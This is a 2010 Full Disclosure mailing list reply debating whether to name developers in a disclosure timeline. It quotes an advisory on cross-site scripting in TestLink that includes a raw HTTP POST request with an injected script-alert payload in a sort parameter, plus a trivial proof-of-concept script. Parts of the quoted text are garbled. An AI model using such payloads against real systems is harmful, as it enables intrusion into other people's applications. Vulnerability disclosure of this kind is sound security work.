Full Disclosure mailing list archives
Re: [Full-disclosure] Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System
From: "Prashant" <clickprashant () rediffmail com>
Date: 15 Jan 2010 18:26:43 -0000
Jeff , I dont know its right or wrong to disclose developer name in a timeline but some times it helps finding the contact points of the vendor from old mail archive and in my case it did help. I know its debatable .. There are lots of advisories which had used timelines and these have been released by reputed companies. http://lists.grok.org.uk/pipermail/full-disclosure/2009-December/071923.html http://lists.grok.org.uk/pipermail/full-disclosure/2009-October/071052.html If Vendor is big company i guess its not a good idea to state Vendor name in timeline. But if vendor is opensource then i guess there is no harm giving developer name in timeline .Getting contact point of open source softwares can some times be painful. Btw that i know there is no real world revelance of and exploit for XSS which triggers a jscript alert. The POC which i gave with this advisory was just to Verify the issue as this particular XSS can only be exploited with an "Authenticated HTTP POST" On Fri, 15 Jan 2010 18:29:09 +0530 wrote
Prashant,Usually we do not mention the engineer/dev name's in a timeline, that's totaly a jackass move.Anyone civilized would mention in this case : "{DATE} says "
Btw posting an "exploit" to trigger a Js alert, it's priceless; Dude you made my night. 2010/1/15 Prashant 1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System. Discovered by: Prashant Khandelwal (clickprashant () gmail com) 2.Vulnerability Information Class: Cross site scriping Impact :Code execution Remotely Exploitable: Yes Locally Exploitable: No 3. Vulnerable packages. Versions affected :All versions ">alert(726367128870)%3B Request POST /testlink/lib/usermanagement/usersView.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: x.x.x.x Content-Length: 146 Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381 Connection: Close Pragma: no-cache operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login 5. Proof Of Concept ====================== #!/usr/bin/env bash # Prashant Khandelwal [clickprashant () gmail com] # Cross site scripting in Testlink the Test Management Tool # Vendor : Testlink http://www.teamst.org # Affected Version : userView.php echo "Please open userView.php in browser a java script alert with text 123456789 should pop up" ===================== 6. Report Timeline I) 5-Jan-2010 Vulnerability dicovered II) 11-Jan-2010 Notified about the vulnerability to the developer Francisco Mancardi & Martin Havlat from testlink team IV) 11-Jan-2010 Francisco Mancardi ask for POC. V) 14-Jan-2010 POC's given VI) 15-Jan-2010 Francisco Mancardi says these vulnerabilities cannot be patched at the moment and has not commited any timeline for fixing the same. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: [Full-disclosure] Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System Prashant (Jan 15)